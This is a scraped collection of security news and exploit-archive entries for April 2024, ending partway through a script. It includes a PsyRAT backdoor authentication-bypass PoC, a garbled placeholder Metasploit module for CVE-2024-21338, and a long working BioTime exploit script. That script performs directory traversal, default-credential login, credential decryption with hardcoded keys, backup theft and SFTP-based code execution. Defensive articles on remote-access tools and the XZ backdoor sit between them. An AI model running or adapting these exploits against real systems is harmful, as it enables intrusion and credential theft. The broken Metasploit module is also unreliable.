The PsyRAT 0.01 malware listens on random high TCP ports 53297, 53211, 532116 and so forth. Connecting to an infected host returns a logon prompt for PASS. However, you can enter anything or nothing at all and execute commands made available by the backdoor.

    Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024Original source: https://malvuln.com/advisory/0e6e40aad3e8d46e3c0c26ccc6ab94b3.txtContact: malvuln13@gmail.comMedia: twitter.com/malvulnThreat: Backdoor.Win32.Agent.ju (PSYRAT)Vulnerability: Authentication Bypass RCEFamily: PSYRATType: PE32MD5: 0e6e40aad3e8d46e3c0c26ccc6ab94b3Vuln ID: MVID-2024-0677Disclosure: 04/01/2024Description: The PsyRAT 0.01 malware listens on random high TCP ports 53297, 53211, 532116 and so forth. Connecting to an infected host returns a logon prompt for PASS. However, you can enter anything or nothing at all and execute commands made available by the backdoor. The malware will return a BADPWD and or "Invalid command" error string but the command executes regardless. Custom client is required as it seems to dislike CRLF \r\n characters when using netcat or telnet.getdrives C\ - Fixed Drive^D\ - CD-ROM^cpuinfo Windows Version |System Directory C\WINDOWS\system32|Computer Name DESKTOP-2C4IQJO|Username VICTIM|CPU Speed 2808 MHz|CPU Type GenuineIntel|------|PsyRAT Version PsyRAT 1.02|IP/Port 192.168.18.130|Password |Install name |Reg value |PHP URLexe_sho [Program_Name] starts a program Exploit/PoC:from socket import *MALWARE_HOST="x.x.x.x"PORT=55116s=socket(AF_INET, SOCK_STREAM)s.connect((MALWARE_HOST, PORT))#send bad passwordPAYLOAD="malvuln" s.send(PAYLOAD.encode())#call commandsPAYLOAD="exe_sho calc" s.send(PAYLOAD.encode())s.close()Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Backdoor.Win32.Agent.ju (PSYRAT) MVID-2024-0677 Bypass / Command Execution

ASUS Control Center Express version 01.06.15 suffers from an unquoted service path vulnerability.

    # Exploit Title: ASUS Control Center Express 01.06.15 - Unquoted Service PathPrivilege Escalation# Date: 2024-04-02# Exploit Author: Alaa Kachouh# Vendor Homepage:https://www.asus.com/campaign/ASUS-Control-Center-Express/global/# Version: Up to 01.06.15# Tested on: Windows# CVE: CVE-2024-27673===================================================================ASUS Control Center Express Version =< 01.06.15 contains an unquotedservice path which allows attackers to escalate privileges to the systemlevel.Assuming attackers have write access to C:\, the attackers can abuse theAsus service "Apro console service"/apro_console.exe which upon restartingwill invoke C:\Program.exe with SYSTEM privileges.The binary path of the service alone isn't susceptible, but upon itsinitiation, it will execute C:\program.exe as SYSTEM.Service Name: AProConsoleServicebinary impacted: apro_console.exe# If a malicious payload is inserted into C:\  and service is executed inany way, this can grant privileged access to the system and performmalicious activities.

ASUS Control Center Express 01.06.15 Unquoted Service Path

Microsoft Windows version 10.0.17763.5458 kernel IOCTL privilege escalation exploit.

    ############################################## Exploit Title :  EXPLOIT Microsoft Windows Kernel Exposed IOCTL with Insufficient Access Control Vulnerability CVE-2024-21338 ### This module requires Metasploit: https://metasploit.com/download## Author : E1.Coders ## ## Contact : E1.Coders [at] Mail [dot] RU ## ## Security Risk : High ## ## ############################################## require 'msf/core' class MetasploitModule < Msf::Exploit::Remote  Rank = NormalRanking   include Msf::Exploit::Remote::DCERPC  include Msf::Exploit::Remote::DCERPC::MS08_067::Artifact   def initialize(info = {})    super(      update_info(        info,        'Name' => 'CVE-2024-21338 Exploit',        'Description' => 'This module exploits a vulnerability in FooBar version 1.0. It may lead to remote code execution.',        'Author' => 'You',        'License' => MSF_LICENSE,        'References' => [          ['CVE', '2024-21338']        ]      )    )     register_options(      [        OptString.new('RHOST', [true, 'The target address', '127.0.0.1']),        OptPort.new('RPORT', [true, 'The target port', 1234])      ]    )  end   def check    connect     begin      impacket_artifact(dcerpc_binding('ncacn_ip_tcp'), 'FooBar')    rescue Rex::Post::Meterpreter::RequestError      return Exploit::CheckCode::Safe    end     Exploit::CheckCode::Appears  end   def exploit    connect     begin      impacket_artifact(        dcerpc_binding('ncacn_ip_tcp'),        'FooBar',        datastore['FooBarPayload']      )    rescue Rex::Post::Meterpreter::RequestError      fail_with Failure::UnexpectedReply, 'Unexpected response from impacket_artifact'    end     handler    disconnect  endend  #refrence :  https://nvd.nist.gov/vuln/detail/CVE-2024-21338

Microsoft Windows 10.0.17763.5458 Privilege Escalation

Our Trusted Advisor dashboard provides an easy-to-understand assessment of your device’s security.

First released for Windows last year, the Malwarebytes Trusted Advisor dashboard is also now available on Mac, iOS and Android. 

Our Trusted Advisor dashboard provides an easy-to-understand assessment of your device’s security, with a single comprehensive protection score, and clear, expert-driven advice. 

In our recent report, “Everyone’s afraid of the internet, and no-one’s sure what to do about it,” we found that only half of the people surveyed feel confident they know how to stay safe online and even fewer are taking the right measures. 

So, though the fears are big, they are followed by very little action. We want to make things easy for our customers so they know what they should be doing, and how. 

Computer security can be difficult and time consuming, especially if you consider all the different devices and operating systems. We want to help our customers, whatever they use. 

Getting it right means knowing what software needs to be updated, whether your system settings are configured securely, and running active protection that can uncover hidden threats. 

Getting it wrong means leaving gaps in your defences that malware, criminal hackers, and other online threats can sneak through. 

Trusted Advisor takes away the guesswork by delivering a holistic assessment of your security and privacy in a way that’s easy to understand, making issues simple to correct. It combines the proven capabilities of Malwarebytes with the knowledge of the brightest industry experts to give you an expert assessment that puts you one step ahead of the cybercrooks. 

**Protection score**

At the heart of Trusted Advisor is a single, easy-to-understand protection score. If you’re rocking a 100% rating then you know you’re crushing it. 

If your score dips below 100%, we’ll explain why, and offer you a checklist of items to improve your security and boost your score. 

Trusted Advisor’s recommendations are practical and jargon-free, so they’re easy to action.

**Six steps to security**

Trusted Advisor monitors various categories of information around security and privacy to assess your overall Protection Score: 

*   **Real-time protection** monitors your device continuously, stopping and removing threats like malware as they appear. It’s vital for keeping you safe from the most destructive threats and the most common methods of infection, so Trusted Advisor will alert you if you aren’t fully protected. 
*   **Software updates** fix the coding flaws that cybercriminals exploit to steal data or put malware on your system. Staying up to date is one of the most important things you can do for your security, so Trusted Advisor has your back here too. 

*   **General settings** covers settings within Malwarebytes, Operating Systems, or your network preferences. Trusted Advisor checks for settings that may not be configured correctly. For example, on iOS it ensures you have defined a passcode for your device and activated web and call protection. 
*   **Device scans** are routine scans that seek out hidden threats on your system. Trusted Advisor will tell you if you get behind and need to run a scan manually. 
*   **Online privacy** helps you take a proactive stance on your privacy by hiding your IP address and blocking third-party ad trackers, making you’re harder to track on the web. Trusted Advisor monitors this so you only part with the personal information you intend to. 
*   **Device health** guards against slowdowns and other performance problems. Trusted Advisor helps you get the most out of your system so that you aren’t left guessing whether it was malware grinding your device to a halt. 

Even with an excellent score, you can’t guarantee absolute safety, though it places you in the closest proximity to it. By following our recommendations, you’ll be in the best security situation you can be.

**Try it today**

If you’re an existing Malwarebytes customer you will get Trusted Advisor automatically, but if you’re in a hurry, you can go to **Settings** > **About** > **Check for updates** and get it right now. If you aren’t, you can get Trusted Advisor by just **downloading the latest version of Malwarebytes**.

 Trusted Advisor now available for Mac, iOS, and Android   

While there are many legitimate uses for this software, adversaries are also finding ways to use them for command and control in their campaigns.

Tuesday, April 2, 2024 08:00

*   Remote system management/desktop access tools such as AnyDesk and TeamViewer have grown in popularity since 2020. While there are many legitimate uses for this software, adversaries are also finding ways to use them for command and control in their campaigns.
*   There is no easy way to effectively block all unauthorized remote management tools, but security can be greatly improved through a combination of policy and technical controls.
*   Early warning alerts can be configured to alert defenders to remote management software activity that may have circumvented the technical controls.

**The remote management/access software problem**

Since 2020, the use of remote system management/access tools such as AnyDesk and TeamViewer has exploded in popularity due to forced work-from-home during the COVID-19 pandemic.

Whether used by an IT help desk technician to fix a user’s remote system or by co-workers for collaboration, these tools play an essential role in most corporations’ digital functions. However, this convenience comes at a cost. These tools introduce the ability for an adversary to potentially take full remote control of a system, are easy to download and install, and can be very difficult to detect since they are considered legitimate software. 

Further complicating the task of recognizing the malicious use of these tools, many organizations struggle to combat “shadow IT” in which individual users or overly proactive IT personnel might install unauthorized remote management tools to accomplish a benign goal.

Cisco Talos Incident Response (Talos IR) is seeing adversaries capitalize on this opportunity in the wild. We recently noted in our Quarterly Trends report for the third quarter of 2023, “AnyDesk was observed in all ransomware and pre-ransomware engagements \[. . .\], underscoring its role in ransomware affiliates' attack chains.”

While AnyDesk is a legitimate application, it highlights the tremendous value that can be gained through a security program that intentionally focuses on preventing unauthorized use of these tools. Talos is referencing AnyDesk for the purposes of this blog post, but any remote management tool is at risk of these exploits. There are several policy changes, technical countermeasures and security alerts that admins and defenders can use to ensure that AnyDesk, and similar pieces of software, are only used for legitimate purposes when deployed.

Adopting one, or at most two, approved remote management solutions will allow the organization to thoroughly test and deploy in the most secure possible configuration.

If possible, integration with other organizational technology such as Active Directory or multi-factor authentication (MFA) will provide additional layers of protection and verification. Tying the approved remote management solutions into these already structured security solutions can make it easier to build “early warning” detections and alerts around unauthorized connectivity and use.

Once a solution is approved and championed for the organization, other remote management/access tools should be explicitly banned by policy. Ideally, this should be accompanied by a software inventory audit and published guidance on approved/non-approved software for the organization. Training and consistent enforcement of this policy will help reduce the “shadow IT” noise in the environment and leave network defenders with more time to investigate true anomalies.

**Technical controls**

While very worthwhile, preventing unauthorized use of these tools is not simple. First, the scores of commercially available remote access tools make it difficult to address every option an adversary might use. Many of those tools are frequently updated, meaning that blocking the executables by their hash value is not as effective. 

Adversaries also commonly rename the executables, meaning that filename blocks aren’t going to be helpful, either. 

Many popular solutions operate over common ports and protocols, such as ports 80 and 443, making them difficult to block at the firewall, and remote access tool creators often decline to publish their central server IP addresses due to frequently changing resolutions, which limits the effectiveness of static IP address blocks. A combination of approaches and techniques is necessary to limit the opportunity for an adversary to use remote access/management tools in any given environment.

**DNS security controls**

One of the most effective methods for detecting, and sometimes blocking, the activities of unauthorized remote management/access software, is by auditing and blocking DNS queries associated with these tools.

If your organization uses Cisco Umbrella for DNS security, it’s fairly easy to review and block DNS queries related to unauthorized traffic.

To review what might already be on your network, log into the Umbrella console and view “Reporting > App Discovery > Unreviewed Apps,” filtered by the “Collaboration” and “IT Services Management” categories, this is an excellent starting point to identify unexpected remote access software.

Simply clicking “Block this app” gives the administrator the ability to block future DNS requests associated with any particular result. If you prefer to take an even more proactive approach, going to “Policies > Policy Components > Application Settings” allows you to search all applications currently categorized by Umbrella, whether they have been seen on your network or not, and block them by policy. Again, the “Collaboration” and “IT Services Management” categories should be the areas of focus for policy review.

As with all of these technical controls, there are a few limitations. The first major caveat is that this only works if the DNS queries are evaluated by your security stack. In the case of DNS traffic from a home user’s system not traveling over the corporate network, the activity would be invisible. The second major caveat is that some remote management software has direct peer-to-peer capabilities, meaning the software might not send a DNS query to an easily identifiable domain when initiating a connection. 

**Firewall controls**

While less scalable and reliable, basic IP address blocking can be beneficial for preventing unauthorized remote software connections. Some vendors list static IP addresses for their central servers on their support sites that can be leveraged to control this access. However, many vendor IP addresses change periodically, making the task a bit challenging.

Another potentially fruitful approach to firewall traffic blocking is by port number. For example, TeamViewer prefers to use port 5938, although it can fall back on the practically unblockable port 443. While blocking port 5938 would not stop the connection, a properly configured alert would provide defenders with an early warning that TeamViewer was trying to connect out.

Some firewalls also provide additional functionality around session content, similar to Umbrella’s capabilities. Firewalls such as Cisco’s Meraki provide an allow/block URL listing that can be configured to prevent connectivity to unapproved remote management software sites. Cisco Meraki can provide content filtering options that may be helpful in blocking remote management/access sites.

Administrators should consider that firewall controls to combat unauthorized remote software management connections can have unintended consequences and should be heavily tested and piloted prior to implementation.

Verify that IP addresses are dedicated to that application prior to blocking in order to avoid blocking Content Delivery Network (CDN) nodes or other cloud computing shared resources. 

Finally, network segmentation or micro-segmentation can be useful in blocking unauthorized remote management software usage. For instance, categorizing and organizing server resources separate from workstation resources can allow for more tailored options around blocking all unnecessary traffic at the firewall, include that which may be associated with remote management tools. Some organizations already do this well by integrating with group policy configurations.

**Host-based controls****Windows Defender Application Control (WDAC) and AppLocker**

Of all the controls discussed in this post, WDAC and AppLocker are the only ones that can offer almost 100 percent protection against unauthorized remote management/access software execution.

In their most secure configuration, which allows only pre-approved software to run, users or adversaries can't run unexpected executables. However, this comes at a cost, as the approved software baseline maintenance level of effort can be high, and the user experience can be very limited if they are not allowed to install applications as needed.

WDAC and AppLocker offer considerable flexibility in their policies, so some organizations choose to only lock down their critical servers, such as domain controllers, which leaves user system policies more flexible. This approach has benefits far beyond simply blocking remote access/management software, as it will stop most malware from executing, as well.

Keep in mind that, while WDAC is currently more difficult to configure, it has more advanced capabilities and Microsoft is positioning it as the replacement for AppLocker. At the moment, AppLocker is receiving security updates, but no new feature updates.

**Registry filename blocks**

It is possible to block remote management/access software execution by filename via a registry “DisallowRun” key. However, Talos IR does not recommend this approach, except as a containment measure during incident response, since it is not scalable as a preventative measure and is trivially easy to bypass by renaming the executable or modifying the registry. 

**EDR blocks**

Almost every modern EDR can block file hashes, which gives defenders the capability to block the hashes associated with remote management/access software installers and/or installed executables. However, similarly to the filename GPO blocks, this is not scalable or reliable as a proactive measure, since every new version of every software distribution will have a new hash value. This measure should be restricted to containment during incident response only. 

Some EDR solutions offer methods to block vulnerable or unauthorized software, albeit with significant caveats regarding the limitations of those capabilities. The authors of this article have not tested those capabilities but note them here for the sake of completeness.

**Host-based firewalls**

The recommendations for host-based firewall rules are much the same as standalone firewalls, covered above. These can be useful where administrators expect users to roam outside of the boundary of the corporate network, such as home workers off the corporate VPN or using a split-tunnel VPN implementation. 

**Administrator permission restriction**

Restricting administrator permissions so that most users cannot conduct administrator actions on their work computer, such as installing remote access/management software, can help limit an adversary’s ability to install this software after the initial compromise.

Applying the principle of least privilege, which includes both locking down local administrator permissions and limiting the permissions of users’ domain accounts, is considered standard best practice.

**NAC controls**

While network access control (NAC) solutions do not directly block the use of remote management software, they can ensure that all other technical controls are working properly before admitting an endpoint to the network. If the device is a rogue system or lacks EDR, for example, NAC would prevent it from joining.

Another benefit offered by a NAC solution is software version enforcement through custom rules. In Cisco ISE, for example, there are Posture Checks. Organizations can use this to ensure that only the approved version(s) of their approved remote management tool are allowed on the network, directly addressing the threat of an adversary introducing an older version of the approved solution to the network for malicious purposes.

**Alerts and forensics**

Due to the complexity of implementing all these controls, detection rules can serve as a backup in case an adversary finds a way to circumvent the previous mitigations we discussed. The possibilities for these “tripwire” detections are endless, and SOCs/threat-hunting teams should continuously think of ways to improve them, but some ideas are listed below.

**Central log collection**

The first prerequisite for any successful detections is to have centralized log aggregation. At the very minimum, this should ingest firewall logs, EDR alerts and Windows Event logs for key servers. 

**SIEM alerts for suspicious strings**

Setting up a simple alert that triggers upon observation of strings associated with unauthorized remote access/management software product names (e.g., “AnyDesk”) can be an effective way to proactively identify unexpected product installations that were not otherwise blocked.

For example, an MSI installation would generate an Event 11707 entry in the Windows Application Event logs containing the software product name. If the SIEM were ingesting and evaluating those event logs, it would fire an alert, thereby alerting the SOC to a potential installation. This rule would need to be tuned to avoid excessive false positives, but it could result in a valuable early detection method. 

**SIEM alerts for firewall blocks on unique ports**

Enhanced alerting may be necessary to draw a SOC’s attention to firewall blocks associated with remote management/access traffic. Firewalls continuously block traffic, generally dropping thousands or millions of packets per hour. With that in mind, SOCs are not alerted every time a firewall rule drops traffic — especially if the rule that drops the traffic is the Implicit Deny rule blocking all traffic that was not specifically allowed. However, if an internal host attempts to communicate over a port dedicated to remote access/management software, that might merit attention from the SOC. 

It's worth considering creating an SIEM rule that alerts on any firewall block event involving outbound traffic to certain key ports, for example, 5938 (associated with TeamViewer). That alert, while an indication that the network blocks are working as intended, would be a good indication that the SOC needs to investigate the system originating the traffic.

The level of effort required to properly secure remote management/access software is daunting. However, the frequency of use by adversaries makes that effort a necessity. In the wrong hands, these tools serve as a ready-made command and control mechanism. If an organization can afford to secure its VPN solution, it should almost certainly devote resources to locking down unauthorized remote management software, as well.

Adversaries are leveraging remote access tools now more than ever — here’s how to stop them

By Waqas
Critical Backdoor Alert! Patch XZ Utils Now (CVE-2024-3094) & Secure Your Linux System. Learn how a hidden backdoor…
This is a post from HackRead.com Read the original post: Backdoor Discovered in XZ Utils: Patch Your Systems Now (CVE-2024-3094)

Critical Backdoor Alert! Patch XZ Utils Now (CVE-2024-3094) & Secure Your Linux System. Learn how a hidden backdoor puts Linux at risk and how to patch it immediately.

A critical security vulnerability, designated CVE-2024-3094, was recently discovered in the widely used XZ Utils package. This vulnerability threatens Linux systems with backdoor attacks.

For your information, XZ Utils is a collection of open-source command-line tools for data compression and decompression. It includes the popular xz command and the liblzma library, which is used by other software, most notably OpenSSH – the program that enables secure remote access to Linux systems.

****The Backdoor Explained****

The vulnerability involved a malicious backdoor hidden within the source code of XZ Utils, specifically in the liblzma library. This backdoor code, if triggered, could allow an attacker to gain unauthorized remote access to a vulnerable system through SSH. The attacker wouldn’t even need valid credentials, potentially granting complete control over the system.

****Impact and Discovery****

The potential impact of this vulnerability is severe. An attacker exploiting CVE-2024-3094 could steal sensitive data, install malware, disrupt critical operations, or even use the compromised system to launch further attacks.

Fortunately, the backdoor was discovered by the security community in late March 2024 before widespread distribution. This prevented a large-scale security breach. However, some Linux users remain vulnerable, especially those using unstable or rolling-release distributions.

****Who is Affected?****

According to OpenSSH’s report, the specific versions of XZ Utils containing the backdoor were 5.6.0 and 5.6.1. These versions were only recently released and did not make it into the stable branches of most major Linux distributions. However, users who manually compiled these versions from source code or installed them from non-standard repositories could be at risk.

Commenting on this, John Bambenek, President at Bambenek Consulting warned, _“_The original reports of this backdoor showed exploitation of this vulnerability via SSH which means it can be triggered even if the victim machine’s users don’t use XZ and its library. It seems this library tends to be installed by default on modern Linux distributions so organizations should immediately prioritize downgrading the package until a safe update is released, even if they don’t use the tools themselves._“_

****Mitigation and Prevention****

The most critical step to address this vulnerability is to update your system immediately. Most Linux distributions have released patch updates for XZ Utils. Here’s how to update depending on your distribution:

*   **Debian/Ubuntu:** Use sudo apt update and sudo apt upgrade commands.
*   **Red Hat/CentOS/Fedora:** Use sudo dnf update command.
*   **Other Distributions:** Refer to your distribution’s specific update instructions.

****Lessons Learned****

The discovery of CVE-2024-3094 emphasizes the importance of various security measures. Firstly, keeping software and systems updated with regular patches is crucial to mitigate potential risks.

Secondly, maintaining a sharp review process for open-source projects aids in the early detection of vulnerabilities. Thirdly, promoting security awareness among users and employees through education about risks and best practices is essential for enhancing overall protection. Adhering to these practices enables us to reduce the impact of vulnerabilities like CVE-2024-3094 and safeguard the security of our systems.

1.  New Linux Malware Alert: ‘Spinning YARN’ Hits Docker
2.  Crypto Stealing PyPI Malware Hits Windows, Linux Users
3.  Magnet Goblin Using Ivanti Flaws to Deploy Linux Malware
4.  Bifrost RAT Variant Hits Linux Devices, Mimics VMware Domain
5.  Xamalicious Backdoor Infects Android Apps, Affects 327K Devices

Backdoor Discovered in XZ Utils: Patch Your Systems Now (CVE-2024-3094)

BioTime versions 8.5.5 and 9.0.1 suffer from directory traversal and file write vulnerabilities. This exploit also achieves remote code execution on version 8.5.5.

    #  __________.__     ___________.__                #  \______   \__| ___\__    ___/|__| _____   ____  #   |    |  _/  |/  _ \|    |   |  |/     \_/ __ \ #   |    |   \  (  <_> )    |   |  |  Y Y  \  ___/ #   |______  /__|\____/|____|   |__|__|_|  /\___  >#          \/                            \/     \/ # Tested on 8.5.5 (Build:20231103.R1905)# Tested on 9.0.1 (Build:20240108.18753)# BioTime, "time" for shellz!# https://claroty.com/team82/disclosure-dashboard/cve-2023-38952# https://claroty.com/team82/disclosure-dashboard/cve-2023-38951# https://claroty.com/team82/disclosure-dashboard/cve-2023-38950# RCE by adding a user to the system, not the app.# Relay machine creds over smb, while creating a backup# Decrypt SMTP, LDAP or SFTP creds, if any.# Get sql backup. Good luck cracking those hashes!# Can use Banner to determine which version is running# Server: Apache/2.4.29 (Win64) mod_wsgi/4.5.24 Python/2.7# Server: Apache/2.4.52 (Win64) mod_wsgi/4.7.1 Python/3.7# Server: Apache/2.4.48 (Win64) mod_wsgi/4.7.1 Python/3.7# Server: Apache => BioTime Version 9# @w3bd3vil - Krash Consulting (https://krashconsulting.com/fury-of-fingers-biotime-rce/)import requestsfrom bs4 import BeautifulSoupimport osimport jsonimport sysfrom Crypto.Cipher import AESfrom Crypto.Cipher import ARC4import base64from binascii import b2a_hex, a2b_hexrequests.packages.urllib3.disable_warnings()proxies = {    'http': 'http://127.0.0.1:8080',  # Proxy for HTTP traffic    'https': 'http://127.0.0.1:8080'  # Proxy for HTTPS traffic}proxies = {}target =  sys.argv[1]def decrypt_rc4(base64_encoded_rc4, password="biotime"):    encrypted_data = base64.b64decode(base64_encoded_rc4)    cipher = ARC4.new(password.encode())    decrypted_data = cipher.decrypt(encrypted_data)    return decrypted_data.decode()# base64_encoded_rc4 = "fj8xD5fAY6r6s3I="# password = "biotime"# decrypted_data = decrypt_rc4(base64_encoded_rc4, password)# print("Decrypted data:", decrypted_data)AES_PASSWORD = b'china@2018encryption#aes'AES_IV = b'zkteco@china2019'def filling_data(data, restore=False):    '''    :param data: str    :return: str    '''    if restore:        return data[0:-ord(data[-1])]    block_size = AES.block_size  # Use AES.block_size instead of None.block_size    return data + (block_size - len(data) % block_size) * chr(block_size - len(data) % block_size)def aes_encrypt(content):    '''    Encryption    :param content: str, The length of content must be times of AES.block_size, using filling_data to fill out    :return: str    '''    if isinstance(content, bytes):        content = str(content, 'utf-8')    cipher = AES.new(AES_PASSWORD, AES.MODE_CBC, AES_IV)    encrypted = cipher.encrypt(filling_data(content).encode('utf-8'))    result = b2a_hex(encrypted).decode('utf-8')    return resultdef aes_decrypt(content):    '''    Decryption    :param content: str or bytes, Encryption string    :return: str    '''    if isinstance(content, str):        content = content.encode('utf-8')    cipher = AES.new(AES_PASSWORD, AES.MODE_CBC, AES_IV)    result = cipher.decrypt(a2b_hex(content)).decode('utf-8')    return filling_data(result, restore=True)#Check BioTimeurl = f'{target}/license/'response = requests.get(url, proxies=proxies, verify=False)html_content = response.contentsoup = BeautifulSoup(html_content, 'html.parser')build_lines = [line.strip() for line in soup.get_text().split('\n') if 'build' in line.lower()]build = Nonefor line in build_lines:    build = line    print(f"Found BioTime: {line}")    breakif build != None:    buildNumber = build[0]else:    print("Unsupported Target!")    sys.exit(1)# Dir Traversalurl = f'{target}/iclock/file?SN=win&url=/../../../../../../../../windows/win.ini'response = requests.get(url, proxies=proxies, verify=False)try:    print("Dir Traversal Attempt\nOutput of windows/win.ini file:")    print(base64.b64decode(response.text).decode('utf-8'))    try:        url = f'{target}/iclock/file?SN=att&url=/../../../../../../../../biotime/attsite.ini'        response = requests.get(url, proxies=proxies, verify=False)        attConfig = base64.b64decode(response.text).decode('utf-8')        #print(f"Output of BioTime config file: {attConfig}")    except:        try:            url = f'{target}/iclock/file?SN=att&url=/../../../../../../../../zkbiotime/attsite.ini'            response = requests.get(url, proxies=proxies, verify=False)            attConfig = base64.b64decode(response.text).decode('utf-8')            #print(f"Output of BioTime config file: {attConfig}")        except:            print("Couldn't get BioTime config file (possibly non default configuration)")    lines = attConfig.split('\n')    for i, line in enumerate(lines):        if "PASSWORD=@!@=" in line:            dec_att = decrypt_rc4(lines[i].split("@!@=")[1])            lines[i] = lines[i].split("@!@=")[0]+dec_att    attConfig_modified = '\n'.join(lines)    print(f"Output of BioTime Decrypted config file:\n{attConfig_modified}")except:    print("Couldn't exploit Dir Traversal")# Extract Cookiesurl = f'{target}/login/'response = requests.get(url, proxies=proxies, verify=False)if response.status_code == 200:    soup = BeautifulSoup(response.text, 'html.parser')    csrf_token_header = soup.find('input', {'name': 'csrfmiddlewaretoken'})    if csrf_token_header:        csrf_token_header_value = csrf_token_header['value']        print(f"CSRF Token Header: {csrf_token_header_value}")        session_id_cookie = response.cookies.get('sessionid')    if session_id_cookie:        print(f"Session ID: {session_id_cookie}")        csrf_token_value = response.cookies.get('csrftoken')    if csrf_token_value:        print(f"CSRF Token Cookie: {csrf_token_value}")else:    print(f"Failed to retrieve data from {url}. Status code: {response.status_code}")# Login Now!cookies = {    'sessionid': session_id_cookie,    'csrftoken': csrf_token_value}for i in range(1,10):    username = i    password = '123456' # Deafult password!    data = {        'username': username,        'password': password,        'captcha':'',        'login_user':'employee'    }    headers = {        'User-Agent': 'Krash Consulting',        'X-CSRFToken': csrf_token_header_value    }    response = requests.post(url, data=data, cookies=cookies, headers=headers, proxies=proxies, verify=False)    if response.status_code == 200:        json_response = response.json()        ret_value = json_response.get('ret')        if ret_value == 0:            print(f"Valid Credentials found: Username is {username} and password is {password}")            session_id_cookie = response.cookies.get('sessionid')            if session_id_cookie:                print(f"Auth Session ID: {session_id_cookie}")                        csrf_token_value = response.cookies.get('csrftoken')            if csrf_token_value:                print(f"Auth CSRF Token Cookie: {csrf_token_value}")            breakif i == 9:    print("No valid users found!")    sys.exit(1)# Check for Backupsdef downloadBackup():    url = f'{target}/base/dbbackuplog/table/?page=1&limit=33'    cookies = {        'sessionid': session_id_cookie,        'csrftoken': csrf_token_value    }    response = requests.get(url, cookies=cookies, proxies=proxies, verify=False)    response_data = response.json()    print("Backup files list")    print(json.dumps(response_data, indent=4))    if response_data['count'] > 0:        backup_info = response_data['data'][0]  # Latest Backup        operator_name = backup_info['operator']        backup_file = backup_info['backup_file']        db_type = backup_info['db_type']        print("Operator:", operator_name)        print("Backup File:", backup_file)        print("Database Type:", db_type)        if buildNumber == "9":            createBackup()            print("Backup File password: Krash")        #download = os.path.basename(backup_file)        path = os.path.normpath(backup_file)        try:            split_path = path.split(os.sep)            files_index = split_path.index('files')            relative_path = '/'.join(split_path[files_index + 1:])        except:            return False        url = f'{target}/files/{relative_path}'        print(url)        response = requests.get(url, proxies=proxies, verify=False)        if response.status_code == 200:            filename = os.path.basename(url)            with open(filename, 'wb') as file:                file.write(response.content)            print(f"File '{filename}' downloaded successfully.")        else:            print("Failed to download the file. Status code:", response.status_code)        return False    else:        print("No backup Found!")        return Truedef createBackup(targetPath=None):    print("Attempting to create backup.")    url = f'{target}/base/dbbackuplog/action/?action_name=44424261636b75704d616e75616c6c79&_popup=true&id='    cookies = {        'sessionid': session_id_cookie,        'csrftoken': csrf_token_value    }    response = requests.get(url, cookies=cookies, proxies=proxies, verify=False)    html_content = response.content    soup = BeautifulSoup(html_content, 'html.parser')    pathBackup = [line.strip() for line in soup.get_text().split('\n') if 'name="file_path"' in line.lower()]    print(f"Possible backup location: {pathBackup}")    url = f'{target}/base/dbbackuplog/action/'    if targetPath == None:        if buildNumber == "9" or build[:5] == "8.5.5":            targetPath = "C:\\ZKBioTime\\files\\backup\\"        else:            targetPath = "C:\\BioTime\\files\\fw\\"    if buildNumber == "9":        data = {            'csrfmiddlewaretoken': csrf_token_value,            'file_path':targetPath,            'action_name': '44424261636b75704d616e75616c6c79',            'backup_encryption_choices': '2',            'auto_backup_password': 'Krash'        }    else:        data = {            'csrfmiddlewaretoken': csrf_token_value,            'file_path':targetPath,            'action_name': '44424261636b75704d616e75616c6c79'        }    response = requests.post(url,  cookies=cookies, data=data, proxies=proxies, verify=False)    if response.status_code == 200:        print("Backup Initiated.")    else:        print("Backup failed!")if downloadBackup():    createBackup()    downloadBackup()url = f'{target}/base/api/systemSettings/email_setting/'cookies = {    'sessionid': session_id_cookie,    'csrftoken': csrf_token_value}response = requests.get(url, cookies=cookies, proxies=proxies, verify=False)if response.status_code == 200:    response_data = response.json()    print("SMTP Settings")    for key in response_data:        if 'password' in key.lower():            value = response_data[key]            #print(f'{key} decrypted value {aes_decrypt(value)}')            response_data[key] = aes_decrypt(value)    print(json.dumps(response_data, indent=4))url = f'{target}/base/api/systemSettings/ldap_setup/'cookies = {    'sessionid': session_id_cookie,    'csrftoken': csrf_token_value}response = requests.get(url, cookies=cookies, proxies=proxies, verify=False)if response.status_code == 200:    response_data = response.json()    print("LDAP Settings")    for key in response_data:        if 'password' in key.lower():            value = response_data[key]            #print(f'{key} decrypted value {aes_decrypt(value)}')            response_data[key] = aes_decrypt(value)    print(json.dumps(response_data, indent=4))def sftpRCE():    print("Attempting RCE!")    #Add SFTP, Need valid IP/credentials here!    print("Adding FTP List")    url = f'{target}/base/sftpsetting/add/'    myIpaddr = '192.168.0.11'    myUser = 'test'    myPassword = 'test@123'    cookies = {        'sessionid': session_id_cookie,        'csrftoken': csrf_token_value    }    data = {        'csrfmiddlewaretoken': csrf_token_value,        'host':myIpaddr,        'port':22,        'is_sftp': 1,        'user_name':myUser,        'user_password':myPassword,        'user_key':'',        'action_name': '47656e6572616c416374696f6e4e6577'    }    response = requests.post(url,  cookies=cookies, data=data, proxies=proxies, verify=False)    print(response)    url = f'{target}/base/sftpsetting/table/?page=1&limit=33'    cookies = {        'sessionid': session_id_cookie,        'csrftoken': csrf_token_value    }    response = requests.get(url, cookies=cookies, proxies=proxies, verify=False)    response_data = response.json()    print("FTP List")    print(json.dumps(response_data, indent=4))    backup_info = response_data['data'][0]  # Latest SFTP    getID = backup_info['id']    if getID:        print("ID to edit ", getID)    #Edit SFTP (Response can have errors, it doesn't matter)    print("Editing SFTP Settings")    if buildNumber == "9":        dirTraverse = '\..\..\..\python311\lib\io.py'    else:        dirTraverse = '\..\..\..\python37\lib\io.py'    if len(dirTraverse) > 30:        print("Directory Traversal length is greater than 30, will not work!")        sys.exit(1)    url = f'{target}/base/sftpsetting/edit/'    cookies = {        'sessionid': session_id_cookie,        'csrftoken': csrf_token_value    }    data 